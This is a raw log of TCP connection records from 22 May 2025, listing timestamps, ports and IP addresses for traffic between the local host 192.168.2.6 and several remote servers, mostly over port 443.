May 22, 2025 14:02:23.622807980 CEST	443	49697	195.54.163.111	192.168.2.6
May 22, 2025 14:02:23.623156071 CEST	49697	443	192.168.2.6	195.54.163.111
May 22, 2025 14:02:23.623302937 CEST	49696	443	192.168.2.6	195.54.163.111
May 22, 2025 14:02:23.623317957 CEST	443	49696	195.54.163.111	192.168.2.6
May 22, 2025 14:02:23.623600960 CEST	49697	443	192.168.2.6	195.54.163.111
May 22, 2025 14:02:23.623606920 CEST	443	49697	195.54.163.111	192.168.2.6
May 22, 2025 14:02:24.310940981 CEST	443	49696	195.54.163.111	192.168.2.6
May 22, 2025 14:02:24.311042070 CEST	49696	443	192.168.2.6	195.54.163.111
May 22, 2025 14:02:24.315175056 CEST	49696	443	192.168.2.6	195.54.163.111
May 22, 2025 14:02:24.315186024 CEST	443	49696	195.54.163.111	192.168.2.6
May 22, 2025 14:02:24.315349102 CEST	49696	443	192.168.2.6	195.54.163.111
May 22, 2025 14:02:24.315361023 CEST	443	49696	195.54.163.111	192.168.2.6
May 22, 2025 14:02:24.315395117 CEST	49696	443	192.168.2.6	195.54.163.111
May 22, 2025 14:02:24.315399885 CEST	443	49696	195.54.163.111	192.168.2.6
May 22, 2025 14:02:24.317508936 CEST	443	49697	195.54.163.111	192.168.2.6
May 22, 2025 14:02:24.317569017 CEST	49697	443	192.168.2.6	195.54.163.111
May 22, 2025 14:02:24.317833900 CEST	49697	443	192.168.2.6	195.54.163.111
May 22, 2025 14:02:24.317842960 CEST	443	49697	195.54.163.111	192.168.2.6
May 22, 2025 14:02:24.317887068 CEST	443	49696	195.54.163.111	192.168.2.6
May 22, 2025 14:02:24.318433046 CEST	443	49696	195.54.163.111	192.168.2.6
May 22, 2025 14:02:24.318485022 CEST	49696	443	192.168.2.6	195.54.163.111
May 22, 2025 14:02:24.318589926 CEST	49696	443	192.168.2.6	195.54.163.111
May 22, 2025 14:02:24.319518089 CEST	443	49696	195.54.163.111	192.168.2.6
May 22, 2025 14:02:24.320163965 CEST	443	49697	195.54.163.111	192.168.2.6
May 22, 2025 14:02:24.361053944 CEST	49696	443	192.168.2.6	195.54.163.111
May 22, 2025 14:02:24.365284920 CEST	49697	443	192.168.2.6	195.54.163.111
May 22, 2025 14:02:25.238548040 CEST	443	49696	195.54.163.111	192.168.2.6
May 22, 2025 14:02:25.279833078 CEST	49696	443	192.168.2.6	195.54.163.111
May 22, 2025 14:02:25.568074942 CEST	443	49696	195.54.163.111	192.168.2.6
May 22, 2025 14:02:25.568116903 CEST	443	49696	195.54.163.111	192.168.2.6
May 22, 2025 14:02:25.568135977 CEST	443	49696	195.54.163.111	192.168.2.6
May 22, 2025 14:02:25.568152905 CEST	443	49696	195.54.163.111	192.168.2.6
May 22, 2025 14:02:25.568161964 CEST	49696	443	192.168.2.6	195.54.163.111
May 22, 2025 14:02:25.568187952 CEST	443	49696	195.54.163.111	192.168.2.6
May 22, 2025 14:02:25.568209887 CEST	443	49696	195.54.163.111	192.168.2.6
May 22, 2025 14:02:25.568223000 CEST	49696	443	192.168.2.6	195.54.163.111
May 22, 2025 14:02:25.568243980 CEST	49696	443	192.168.2.6	195.54.163.111
May 22, 2025 14:02:25.568263054 CEST	49696	443	192.168.2.6	195.54.163.111
May 22, 2025 14:02:25.700238943 CEST	49678	443	192.168.2.6	20.42.65.91
May 22, 2025 14:02:25.895826101 CEST	443	49696	195.54.163.111	192.168.2.6
May 22, 2025 14:02:25.895840883 CEST	443	49696	195.54.163.111	192.168.2.6
May 22, 2025 14:02:25.895870924 CEST	443	49696	195.54.163.111	192.168.2.6
May 22, 2025 14:02:25.895909071 CEST	49696	443	192.168.2.6	195.54.163.111
May 22, 2025 14:02:25.895924091 CEST	443	49696	195.54.163.111	192.168.2.6
May 22, 2025 14:02:25.895955086 CEST	443	49696	195.54.163.111	192.168.2.6
May 22, 2025 14:02:25.895962954 CEST	49696	443	192.168.2.6	195.54.163.111
May 22, 2025 14:02:25.895970106 CEST	443	49696	195.54.163.111	192.168.2.6
May 22, 2025 14:02:25.896034956 CEST	49696	443	192.168.2.6	195.54.163.111
May 22, 2025 14:02:26.232610941 CEST	443	49696	195.54.163.111	192.168.2.6
May 22, 2025 14:02:26.232628107 CEST	443	49696	195.54.163.111	192.168.2.6
May 22, 2025 14:02:26.232661963 CEST	443	49696	195.54.163.111	192.168.2.6
May 22, 2025 14:02:26.232863903 CEST	49696	443	192.168.2.6	195.54.163.111
May 22, 2025 14:02:26.232884884 CEST	443	49696	195.54.163.111	192.168.2.6
May 22, 2025 14:02:26.232898951 CEST	443	49696	195.54.163.111	192.168.2.6
May 22, 2025 14:02:26.233100891 CEST	49696	443	192.168.2.6	195.54.163.111
May 22, 2025 14:02:26.233109951 CEST	443	49696	195.54.163.111	192.168.2.6
May 22, 2025 14:02:26.233123064 CEST	443	49696	195.54.163.111	192.168.2.6
May 22, 2025 14:02:26.233367920 CEST	49696	443	192.168.2.6	195.54.163.111
May 22, 2025 14:02:26.568717957 CEST	443	49696	195.54.163.111	192.168.2.6
May 22, 2025 14:02:26.568770885 CEST	443	49696	195.54.163.111	192.168.2.6
May 22, 2025 14:02:26.568799973 CEST	443	49696	195.54.163.111	192.168.2.6
May 22, 2025 14:02:26.568972111 CEST	49696	443	192.168.2.6	195.54.163.111
May 22, 2025 14:02:26.568972111 CEST	49696	443	192.168.2.6	195.54.163.111
May 22, 2025 14:02:26.568993092 CEST	443	49696	195.54.163.111	192.168.2.6
May 22, 2025 14:02:26.569308043 CEST	49696	443	192.168.2.6	195.54.163.111
May 22, 2025 14:02:26.900041103 CEST	443	49696	195.54.163.111	192.168.2.6
May 22, 2025 14:02:26.900103092 CEST	443	49696	195.54.163.111	192.168.2.6
May 22, 2025 14:02:26.900121927 CEST	443	49696	195.54.163.111	192.168.2.6
May 22, 2025 14:02:26.900290966 CEST	49696	443	192.168.2.6	195.54.163.111
May 22, 2025 14:02:26.900290966 CEST	49696	443	192.168.2.6	195.54.163.111
May 22, 2025 14:02:26.900305986 CEST	443	49696	195.54.163.111	192.168.2.6
May 22, 2025 14:02:26.900531054 CEST	49696	443	192.168.2.6	195.54.163.111
May 22, 2025 14:02:26.900531054 CEST	49696	443	192.168.2.6	195.54.163.111
May 22, 2025 14:02:26.900562048 CEST	443	49696	195.54.163.111	192.168.2.6
May 22, 2025 14:02:26.900752068 CEST	49696	443	192.168.2.6	195.54.163.111
May 22, 2025 14:02:26.903141975 CEST	443	49696	195.54.163.111	192.168.2.6
May 22, 2025 14:02:26.903189898 CEST	443	49696	195.54.163.111	192.168.2.6
May 22, 2025 14:02:26.903208971 CEST	443	49696	195.54.163.111	192.168.2.6
May 22, 2025 14:02:26.903259993 CEST	443	49696	195.54.163.111	192.168.2.6
May 22, 2025 14:02:26.903423071 CEST	49696	443	192.168.2.6	195.54.163.111
May 22, 2025 14:02:26.903423071 CEST	49696	443	192.168.2.6	195.54.163.111
May 22, 2025 14:02:26.903482914 CEST	443	49696	195.54.163.111	192.168.2.6
May 22, 2025 14:02:26.903595924 CEST	49696	443	192.168.2.6	195.54.163.111
May 22, 2025 14:02:26.903595924 CEST	49696	443	192.168.2.6	195.54.163.111
May 22, 2025 14:02:26.904905081 CEST	49696	443	192.168.2.6	195.54.163.111
May 22, 2025 14:02:26.907437086 CEST	443	49696	195.54.163.111	192.168.2.6
May 22, 2025 14:02:26.907494068 CEST	443	49696	195.54.163.111	192.168.2.6
May 22, 2025 14:02:26.907507896 CEST	443	49696	195.54.163.111	192.168.2.6
May 22, 2025 14:02:26.907546043 CEST	443	49696	195.54.163.111	192.168.2.6
May 22, 2025 14:02:26.907696009 CEST	49696	443	192.168.2.6	195.54.163.111
May 22, 2025 14:02:26.907696009 CEST	49696	443	192.168.2.6	195.54.163.111
May 22, 2025 14:02:26.907814026 CEST	443	49696	195.54.163.111	192.168.2.6
May 22, 2025 14:02:26.907840014 CEST	49696	443	192.168.2.6	195.54.163.111
May 22, 2025 14:02:26.907953978 CEST	49696	443	192.168.2.6	195.54.163.111
May 22, 2025 14:02:27.233726025 CEST	443	49696	195.54.163.111	192.168.2.6
May 22, 2025 14:02:27.233781099 CEST	443	49696	195.54.163.111	192.168.2.6
May 22, 2025 14:02:27.233820915 CEST	443	49696	195.54.163.111	192.168.2.6
May 22, 2025 14:02:27.233874083 CEST	443	49696	195.54.163.111	192.168.2.6
May 22, 2025 14:02:27.233961105 CEST	49696	443	192.168.2.6	195.54.163.111
May 22, 2025 14:02:27.234040022 CEST	49696	443	192.168.2.6	195.54.163.111
May 22, 2025 14:02:27.234112024 CEST	443	49696	195.54.163.111	192.168.2.6
May 22, 2025 14:02:27.234231949 CEST	49696	443	192.168.2.6	195.54.163.111
May 22, 2025 14:02:27.237925053 CEST	49696	443	192.168.2.6	195.54.163.111
May 22, 2025 14:02:27.238025904 CEST	49696	443	192.168.2.6	195.54.163.111
May 22, 2025 14:02:27.569839001 CEST	443	49696	195.54.163.111	192.168.2.6
May 22, 2025 14:02:27.569894075 CEST	443	49696	195.54.163.111	192.168.2.6
May 22, 2025 14:02:27.569940090 CEST	443	49696	195.54.163.111	192.168.2.6
May 22, 2025 14:02:27.570012093 CEST	443	49696	195.54.163.111	192.168.2.6
May 22, 2025 14:02:27.570034027 CEST	49696	443	192.168.2.6	195.54.163.111
May 22, 2025 14:02:27.570075989 CEST	443	49696	195.54.163.111	192.168.2.6
May 22, 2025 14:02:27.570100069 CEST	49696	443	192.168.2.6	195.54.163.111
May 22, 2025 14:02:27.570889950 CEST	49696	443	192.168.2.6	195.54.163.111
May 22, 2025 14:02:27.571047068 CEST	49696	443	192.168.2.6	195.54.163.111
May 22, 2025 14:02:27.586761951 CEST	443	49696	195.54.163.111	192.168.2.6
May 22, 2025 14:02:27.586841106 CEST	49696	443	192.168.2.6	195.54.163.111
May 22, 2025 14:02:27.655164957 CEST	49696	443	192.168.2.6	195.54.163.111
May 22, 2025 14:02:27.655462980 CEST	49696	443	192.168.2.6	195.54.163.111
May 22, 2025 14:02:27.655468941 CEST	443	49696	195.54.163.111	192.168.2.6
May 22, 2025 14:02:27.655891895 CEST	49696	443	192.168.2.6	195.54.163.111
May 22, 2025 14:02:27.656475067 CEST	49696	443	192.168.2.6	195.54.163.111
May 22, 2025 14:02:27.656812906 CEST	49696	443	192.168.2.6	195.54.163.111
May 22, 2025 14:02:27.657196045 CEST	49696	443	192.168.2.6	195.54.163.111
May 22, 2025 14:02:27.657207012 CEST	443	49696	195.54.163.111	192.168.2.6
May 22, 2025 14:02:27.657465935 CEST	49696	443	192.168.2.6	195.54.163.111
May 22, 2025 14:02:27.657470942 CEST	443	49696	195.54.163.111	192.168.2.6
May 22, 2025 14:02:27.657918930 CEST	49696	443	192.168.2.6	195.54.163.111
May 22, 2025 14:02:27.658325911 CEST	49696	443	192.168.2.6	195.54.163.111
May 22, 2025 14:02:27.660442114 CEST	443	49696	195.54.163.111	192.168.2.6
May 22, 2025 14:02:27.714947939 CEST	49696	443	192.168.2.6	195.54.163.111
May 22, 2025 14:02:27.716031075 CEST	49696	443	192.168.2.6	195.54.163.111
May 22, 2025 14:02:27.716034889 CEST	443	49696	195.54.163.111	192.168.2.6
May 22, 2025 14:02:27.717012882 CEST	49696	443	192.168.2.6	195.54.163.111
May 22, 2025 14:02:27.717431068 CEST	49696	443	192.168.2.6	195.54.163.111
May 22, 2025 14:02:27.717434883 CEST	443	49696	195.54.163.111	192.168.2.6
May 22, 2025 14:02:27.717849016 CEST	49696	443	192.168.2.6	195.54.163.111
May 22, 2025 14:02:27.718198061 CEST	49696	443	192.168.2.6	195.54.163.111
May 22, 2025 14:02:27.718410969 CEST	49696	443	192.168.2.6	195.54.163.111
May 22, 2025 14:02:27.719600916 CEST	443	49696	195.54.163.111	192.168.2.6
May 22, 2025 14:02:27.725533962 CEST	49696	443	192.168.2.6	195.54.163.111
May 22, 2025 14:02:27.757253885 CEST	49696	443	192.168.2.6	195.54.163.111
May 22, 2025 14:02:27.757257938 CEST	443	49696	195.54.163.111	192.168.2.6
May 22, 2025 14:02:27.757890940 CEST	49696	443	192.168.2.6	195.54.163.111
May 22, 2025 14:02:27.758496046 CEST	49696	443	192.168.2.6	195.54.163.111
May 22, 2025 14:02:27.758498907 CEST	443	49696	195.54.163.111	192.168.2.6
May 22, 2025 14:02:27.988919020 CEST	443	49696	195.54.163.111	192.168.2.6
May 22, 2025 14:02:27.989178896 CEST	443	49696	195.54.163.111	192.168.2.6
May 22, 2025 14:02:27.989222050 CEST	49696	443	192.168.2.6	195.54.163.111
May 22, 2025 14:02:27.990330935 CEST	443	49696	195.54.163.111	192.168.2.6
May 22, 2025 14:02:27.992584944 CEST	443	49696	195.54.163.111	192.168.2.6
May 22, 2025 14:02:27.992662907 CEST	49696	443	192.168.2.6	195.54.163.111
May 22, 2025 14:02:27.992801905 CEST	443	49696	195.54.163.111	192.168.2.6
May 22, 2025 14:02:27.994340897 CEST	443	49696	195.54.163.111	192.168.2.6
May 22, 2025 14:02:27.994390965 CEST	49696	443	192.168.2.6	195.54.163.111
May 22, 2025 14:02:27.995800972 CEST	443	49696	195.54.163.111	192.168.2.6
May 22, 2025 14:02:27.995974064 CEST	443	49696	195.54.163.111	192.168.2.6
May 22, 2025 14:02:27.996051073 CEST	49696	443	192.168.2.6	195.54.163.111
May 22, 2025 14:02:27.997068882 CEST	443	49696	195.54.163.111	192.168.2.6
May 22, 2025 14:02:27.998078108 CEST	443	49696	195.54.163.111	192.168.2.6
May 22, 2025 14:02:27.998147011 CEST	49696	443	192.168.2.6	195.54.163.111
May 22, 2025 14:02:27.998298883 CEST	443	49696	195.54.163.111	192.168.2.6
May 22, 2025 14:02:27.999377966 CEST	443	49696	195.54.163.111	192.168.2.6
May 22, 2025 14:02:27.999444962 CEST	49696	443	192.168.2.6	195.54.163.111
May 22, 2025 14:02:27.999524117 CEST	443	49696	195.54.163.111	192.168.2.6
May 22, 2025 14:02:28.000588894 CEST	443	49696	195.54.163.111	192.168.2.6
May 22, 2025 14:02:28.000662088 CEST	49696	443	192.168.2.6	195.54.163.111
May 22, 2025 14:02:28.000720978 CEST	443	49696	195.54.163.111	192.168.2.6
May 22, 2025 14:02:28.002404928 CEST	443	49696	195.54.163.111	192.168.2.6
May 22, 2025 14:02:28.002571106 CEST	443	49696	195.54.163.111	192.168.2.6
May 22, 2025 14:02:28.002616882 CEST	49696	443	192.168.2.6	195.54.163.111
May 22, 2025 14:02:28.003624916 CEST	443	49696	195.54.163.111	192.168.2.6
May 22, 2025 14:02:28.003734112 CEST	49696	443	192.168.2.6	195.54.163.111
May 22, 2025 14:02:28.003799915 CEST	443	49696	195.54.163.111	192.168.2.6
May 22, 2025 14:02:28.004825115 CEST	443	49696	195.54.163.111	192.168.2.6
May 22, 2025 14:02:28.004885912 CEST	49696	443	192.168.2.6	195.54.163.111
May 22, 2025 14:02:28.004968882 CEST	443	49696	195.54.163.111	192.168.2.6
May 22, 2025 14:02:28.005923986 CEST	443	49696	195.54.163.111	192.168.2.6
May 22, 2025 14:02:28.005973101 CEST	49696	443	192.168.2.6	195.54.163.111
May 22, 2025 14:02:28.006058931 CEST	443	49696	195.54.163.111	192.168.2.6
May 22, 2025 14:02:28.006983995 CEST	443	49696	195.54.163.111	192.168.2.6
May 22, 2025 14:02:28.007042885 CEST	49696	443	192.168.2.6	195.54.163.111
May 22, 2025 14:02:28.007080078 CEST	443	49696	195.54.163.111	192.168.2.6
May 22, 2025 14:02:28.007177114 CEST	443	49696	195.54.163.111	192.168.2.6
May 22, 2025 14:02:28.007213116 CEST	49696	443	192.168.2.6	195.54.163.111
May 22, 2025 14:02:28.007267952 CEST	443	49696	195.54.163.111	192.168.2.6
May 22, 2025 14:02:28.048186064 CEST	443	49696	195.54.163.111	192.168.2.6
May 22, 2025 14:02:28.048249960 CEST	49696	443	192.168.2.6	195.54.163.111
May 22, 2025 14:02:28.048461914 CEST	443	49696	195.54.163.111	192.168.2.6
May 22, 2025 14:02:28.049546957 CEST	443	49696	195.54.163.111	192.168.2.6
May 22, 2025 14:02:28.049591064 CEST	49696	443	192.168.2.6	195.54.163.111
May 22, 2025 14:02:28.228059053 CEST	49700	443	192.168.2.6	20.109.210.53
May 22, 2025 14:02:28.228087902 CEST	443	49700	20.109.210.53	192.168.2.6
May 22, 2025 14:02:28.228163004 CEST	49700	443	192.168.2.6	20.109.210.53
May 22, 2025 14:02:28.229537010 CEST	49700	443	192.168.2.6	20.109.210.53
May 22, 2025 14:02:28.229543924 CEST	443	49700	20.109.210.53	192.168.2.6
May 22, 2025 14:02:28.319612980 CEST	443	49696	195.54.163.111	192.168.2.6
May 22, 2025 14:02:28.320036888 CEST	443	49696	195.54.163.111	192.168.2.6
May 22, 2025 14:02:28.320125103 CEST	49696	443	192.168.2.6	195.54.163.111
May 22, 2025 14:02:28.322016001 CEST	443	49696	195.54.163.111	192.168.2.6
May 22, 2025 14:02:28.322421074 CEST	443	49696	195.54.163.111	192.168.2.6
May 22, 2025 14:02:28.322469950 CEST	49696	443	192.168.2.6	195.54.163.111
May 22, 2025 14:02:28.324026108 CEST	443	49696	195.54.163.111	192.168.2.6
May 22, 2025 14:02:28.324194908 CEST	443	49696	195.54.163.111	192.168.2.6
May 22, 2025 14:02:28.324242115 CEST	49696	443	192.168.2.6	195.54.163.111
May 22, 2025 14:02:28.325285912 CEST	443	49696	195.54.163.111	192.168.2.6
May 22, 2025 14:02:28.325408936 CEST	443	49696	195.54.163.111	192.168.2.6
May 22, 2025 14:02:28.325449944 CEST	49696	443	192.168.2.6	195.54.163.111
May 22, 2025 14:02:28.325486898 CEST	443	49696	195.54.163.111	192.168.2.6
May 22, 2025 14:02:28.327320099 CEST	443	49696	195.54.163.111	192.168.2.6
May 22, 2025 14:02:28.327372074 CEST	49696	443	192.168.2.6	195.54.163.111
May 22, 2025 14:02:28.327497005 CEST	443	49696	195.54.163.111	192.168.2.6
May 22, 2025 14:02:28.328643084 CEST	443	49696	195.54.163.111	192.168.2.6
May 22, 2025 14:02:28.328686953 CEST	49696	443	192.168.2.6	195.54.163.111
May 22, 2025 14:02:28.328790903 CEST	443	49696	195.54.163.111	192.168.2.6
May 22, 2025 14:02:28.329822063 CEST	443	49696	195.54.163.111	192.168.2.6
May 22, 2025 14:02:28.329864025 CEST	49696	443	192.168.2.6	195.54.163.111
May 22, 2025 14:02:28.329962015 CEST	443	49696	195.54.163.111	192.168.2.6
May 22, 2025 14:02:28.331787109 CEST	443	49696	195.54.163.111	192.168.2.6
May 22, 2025 14:02:28.331834078 CEST	49696	443	192.168.2.6	195.54.163.111
May 22, 2025 14:02:28.331942081 CEST	443	49696	195.54.163.111	192.168.2.6
May 22, 2025 14:02:28.332956076 CEST	443	49696	195.54.163.111	192.168.2.6
May 22, 2025 14:02:28.333051920 CEST	443	49696	195.54.163.111	192.168.2.6
May 22, 2025 14:02:28.333096027 CEST	49696	443	192.168.2.6	195.54.163.111
May 22, 2025 14:02:28.334395885 CEST	443	49696	195.54.163.111	192.168.2.6
May 22, 2025 14:02:28.334453106 CEST	49696	443	192.168.2.6	195.54.163.111
May 22, 2025 14:02:28.334481955 CEST	443	49696	195.54.163.111	192.168.2.6
May 22, 2025 14:02:28.334604025 CEST	443	49696	195.54.163.111	192.168.2.6
May 22, 2025 14:02:28.334645033 CEST	49696	443	192.168.2.6	195.54.163.111
May 22, 2025 14:02:28.334758043 CEST	443	49696	195.54.163.111	192.168.2.6
May 22, 2025 14:02:28.335834026 CEST	443	49696	195.54.163.111	192.168.2.6
May 22, 2025 14:02:28.335887909 CEST	49696	443	192.168.2.6	195.54.163.111
May 22, 2025 14:02:28.336019993 CEST	443	49696	195.54.163.111	192.168.2.6
May 22, 2025 14:02:28.337073088 CEST	443	49696	195.54.163.111	192.168.2.6
May 22, 2025 14:02:28.337121964 CEST	49696	443	192.168.2.6	195.54.163.111
May 22, 2025 14:02:28.337220907 CEST	443	49696	195.54.163.111	192.168.2.6
May 22, 2025 14:02:28.338231087 CEST	443	49696	195.54.163.111	192.168.2.6
May 22, 2025 14:02:28.338294029 CEST	49696	443	192.168.2.6	195.54.163.111
May 22, 2025 14:02:28.338337898 CEST	443	49696	195.54.163.111	192.168.2.6
May 22, 2025 14:02:28.338418961 CEST	443	49696	195.54.163.111	192.168.2.6
May 22, 2025 14:02:28.338502884 CEST	49696	443	192.168.2.6	195.54.163.111
May 22, 2025 14:02:28.365556955 CEST	49696	443	192.168.2.6	195.54.163.111
May 22, 2025 14:02:28.408266068 CEST	443	49696	195.54.163.111	192.168.2.6
May 22, 2025 14:02:28.701046944 CEST	443	49696	195.54.163.111	192.168.2.6
May 22, 2025 14:02:28.701569080 CEST	443	49696	195.54.163.111	192.168.2.6
May 22, 2025 14:02:28.701711893 CEST	49696	443	192.168.2.6	195.54.163.111
May 22, 2025 14:02:28.702545881 CEST	443	49696	195.54.163.111	192.168.2.6
May 22, 2025 14:02:28.746632099 CEST	49696	443	192.168.2.6	195.54.163.111
May 22, 2025 14:02:28.844662905 CEST	443	49700	20.109.210.53	192.168.2.6
May 22, 2025 14:02:28.844734907 CEST	49700	443	192.168.2.6	20.109.210.53
May 22, 2025 14:02:28.847646952 CEST	49700	443	192.168.2.6	20.109.210.53
May 22, 2025 14:02:28.847651958 CEST	443	49700	20.109.210.53	192.168.2.6
May 22, 2025 14:02:28.848378897 CEST	443	49700	20.109.210.53	192.168.2.6
May 22, 2025 14:02:28.902856112 CEST	49700	443	192.168.2.6	20.109.210.53
May 22, 2025 14:02:29.489367008 CEST	49700	443	192.168.2.6	20.109.210.53
May 22, 2025 14:02:29.489387989 CEST	49700	443	192.168.2.6	20.109.210.53
May 22, 2025 14:02:29.489483118 CEST	443	49700	20.109.210.53	192.168.2.6
May 22, 2025 14:02:29.490400076 CEST	443	49700	20.109.210.53	192.168.2.6
May 22, 2025 14:02:29.491485119 CEST	443	49700	20.109.210.53	192.168.2.6
May 22, 2025 14:02:29.491566896 CEST	49700	443	192.168.2.6	20.109.210.53
May 22, 2025 14:02:29.493024111 CEST	49700	443	192.168.2.6	20.109.210.53
May 22, 2025 14:02:29.536267996 CEST	443	49700	20.109.210.53	192.168.2.6
May 22, 2025 14:02:29.692194939 CEST	443	49700	20.109.210.53	192.168.2.6
May 22, 2025 14:02:29.746701002 CEST	49700	443	192.168.2.6	20.109.210.53
May 22, 2025 14:02:29.887455940 CEST	443	49700	20.109.210.53	192.168.2.6
May 22, 2025 14:02:29.887492895 CEST	443	49700	20.109.210.53	192.168.2.6
May 22, 2025 14:02:29.887505054 CEST	443	49700	20.109.210.53	192.168.2.6
May 22, 2025 14:02:29.887528896 CEST	443	49700	20.109.210.53	192.168.2.6
May 22, 2025 14:02:29.887551069 CEST	443	49700	20.109.210.53	192.168.2.6
May 22, 2025 14:02:29.887650013 CEST	49700	443	192.168.2.6	20.109.210.53
May 22, 2025 14:02:29.887650013 CEST	49700	443	192.168.2.6	20.109.210.53
May 22, 2025 14:02:29.887650013 CEST	49700	443	192.168.2.6	20.109.210.53
May 22, 2025 14:02:29.887675047 CEST	443	49700	20.109.210.53	192.168.2.6
May 22, 2025 14:02:29.887682915 CEST	443	49700	20.109.210.53	192.168.2.6
May 22, 2025 14:02:29.887696028 CEST	443	49700	20.109.210.53	192.168.2.6
May 22, 2025 14:02:29.887728930 CEST	49700	443	192.168.2.6	20.109.210.53
May 22, 2025 14:02:29.887761116 CEST	49700	443	192.168.2.6	20.109.210.53
May 22, 2025 14:02:29.889782906 CEST	443	49700	20.109.210.53	192.168.2.6
May 22, 2025 14:02:29.889832020 CEST	49700	443	192.168.2.6	20.109.210.53
May 22, 2025 14:02:30.160197973 CEST	49700	443	192.168.2.6	20.109.210.53
May 22, 2025 14:02:30.160655022 CEST	443	49700	20.109.210.53	192.168.2.6
May 22, 2025 14:02:30.160713911 CEST	49700	443	192.168.2.6	20.109.210.53
May 22, 2025 14:02:30.435741901 CEST	49706	80	192.168.2.6	74.125.137.94
May 22, 2025 14:02:30.502948046 CEST	49678	443	192.168.2.6	20.42.65.91
May 22, 2025 14:02:30.612121105 CEST	80	49706	74.125.137.94	192.168.2.6
May 22, 2025 14:02:30.612200975 CEST	49706	80	192.168.2.6	74.125.137.94
May 22, 2025 14:02:30.612353086 CEST	49706	80	192.168.2.6	74.125.137.94
May 22, 2025 14:02:30.790884972 CEST	80	49706	74.125.137.94	192.168.2.6
May 22, 2025 14:02:30.791408062 CEST	80	49706	74.125.137.94	192.168.2.6
May 22, 2025 14:02:30.840444088 CEST	49706	80	192.168.2.6	74.125.137.94
May 22, 2025 14:02:32.387392998 CEST	49672	443	192.168.2.6	204.79.197.203
May 22, 2025 14:02:39.657519102 CEST	49708	80	192.168.2.6	18.218.213.93
May 22, 2025 14:02:39.867146015 CEST	80	49708	18.218.213.93	192.168.2.6
May 22, 2025 14:02:39.867345095 CEST	49708	80	192.168.2.6	18.218.213.93
May 22, 2025 14:02:39.868079901 CEST	49708	80	192.168.2.6	18.218.213.93
May 22, 2025 14:02:40.077631950 CEST	80	49708	18.218.213.93	192.168.2.6
May 22, 2025 14:02:40.105921984 CEST	49678	443	192.168.2.6	20.42.65.91
May 22, 2025 14:02:40.726252079 CEST	80	49708	18.218.213.93	192.168.2.6
May 22, 2025 14:02:40.778175116 CEST	49708	80	192.168.2.6	18.218.213.93
May 22, 2025 14:02:40.914973021 CEST	49709	443	192.168.2.6	16.12.65.210
May 22, 2025 14:02:40.915076971 CEST	443	49709	16.12.65.210	192.168.2.6
May 22, 2025 14:02:40.915190935 CEST	49709	443	192.168.2.6	16.12.65.210
May 22, 2025 14:02:40.924736977 CEST	49709	443	192.168.2.6	16.12.65.210
May 22, 2025 14:02:40.924767971 CEST	443	49709	16.12.65.210	192.168.2.6
May 22, 2025 14:02:41.353089094 CEST	443	49709	16.12.65.210	192.168.2.6
May 22, 2025 14:02:41.353235006 CEST	49709	443	192.168.2.6	16.12.65.210
May 22, 2025 14:02:41.412800074 CEST	49709	443	192.168.2.6	16.12.65.210
May 22, 2025 14:02:41.412830114 CEST	443	49709	16.12.65.210	192.168.2.6
May 22, 2025 14:02:41.413856983 CEST	443	49709	16.12.65.210	192.168.2.6
May 22, 2025 14:02:41.465352058 CEST	49709	443	192.168.2.6	16.12.65.210
May 22, 2025 14:02:41.487423897 CEST	49709	443	192.168.2.6	16.12.65.210
May 22, 2025 14:02:41.532289028 CEST	443	49709	16.12.65.210	192.168.2.6
May 22, 2025 14:02:41.812201023 CEST	443	49709	16.12.65.210	192.168.2.6
May 22, 2025 14:02:41.812917948 CEST	443	49709	16.12.65.210	192.168.2.6
May 22, 2025 14:02:41.812931061 CEST	443	49709	16.12.65.210	192.168.2.6
May 22, 2025 14:02:41.812959909 CEST	443	49709	16.12.65.210	192.168.2.6
May 22, 2025 14:02:41.812980890 CEST	443	49709	16.12.65.210	192.168.2.6
May 22, 2025 14:02:41.813014984 CEST	49709	443	192.168.2.6	16.12.65.210
May 22, 2025 14:02:41.813028097 CEST	443	49709	16.12.65.210	192.168.2.6
May 22, 2025 14:02:41.813066006 CEST	443	49709	16.12.65.210	192.168.2.6
May 22, 2025 14:02:41.813105106 CEST	49709	443	192.168.2.6	16.12.65.210
May 22, 2025 14:02:41.813105106 CEST	49709	443	192.168.2.6	16.12.65.210
May 22, 2025 14:02:41.813133001 CEST	49709	443	192.168.2.6	16.12.65.210
May 22, 2025 14:02:42.021261930 CEST	443	49709	16.12.65.210	192.168.2.6
May 22, 2025 14:02:42.021281004 CEST	443	49709	16.12.65.210	192.168.2.6
May 22, 2025 14:02:42.021318913 CEST	443	49709	16.12.65.210	192.168.2.6
May 22, 2025 14:02:42.021358013 CEST	49709	443	192.168.2.6	16.12.65.210
May 22, 2025 14:02:42.021377087 CEST	443	49709	16.12.65.210	192.168.2.6
May 22, 2025 14:02:42.021440983 CEST	49709	443	192.168.2.6	16.12.65.210
May 22, 2025 14:02:42.022321939 CEST	443	49709	16.12.65.210	192.168.2.6
May 22, 2025 14:02:42.022340059 CEST	443	49709	16.12.65.210	192.168.2.6
May 22, 2025 14:02:42.022356987 CEST	443	49709	16.12.65.210	192.168.2.6
May 22, 2025 14:02:42.022499084 CEST	49709	443	192.168.2.6	16.12.65.210
May 22, 2025 14:02:42.022504091 CEST	443	49709	16.12.65.210	192.168.2.6
May 22, 2025 14:02:42.022546053 CEST	49709	443	192.168.2.6	16.12.65.210
May 22, 2025 14:02:42.230047941 CEST	443	49709	16.12.65.210	192.168.2.6
May 22, 2025 14:02:42.230067015 CEST	443	49709	16.12.65.210	192.168.2.6
May 22, 2025 14:02:42.230074883 CEST	443	49709	16.12.65.210	192.168.2.6
May 22, 2025 14:02:42.230323076 CEST	49709	443	192.168.2.6	16.12.65.210
May 22, 2025 14:02:42.230349064 CEST	443	49709	16.12.65.210	192.168.2.6
May 22, 2025 14:02:42.230391979 CEST	49709	443	192.168.2.6	16.12.65.210
May 22, 2025 14:02:42.231019020 CEST	443	49709	16.12.65.210	192.168.2.6
May 22, 2025 14:02:42.231033087 CEST	443	49709	16.12.65.210	192.168.2.6
May 22, 2025 14:02:42.231151104 CEST	49709	443	192.168.2.6	16.12.65.210
May 22, 2025 14:02:42.442125082 CEST	443	49709	16.12.65.210	192.168.2.6
May 22, 2025 14:02:42.443517923 CEST	49709	443	192.168.2.6	16.12.65.210
May 22, 2025 14:02:42.443659067 CEST	443	49709	16.12.65.210	192.168.2.6
May 22, 2025 14:02:42.443677902 CEST	443	49709	16.12.65.210	192.168.2.6
May 22, 2025 14:02:42.443687916 CEST	443	49709	16.12.65.210	192.168.2.6
May 22, 2025 14:02:42.443852901 CEST	49709	443	192.168.2.6	16.12.65.210
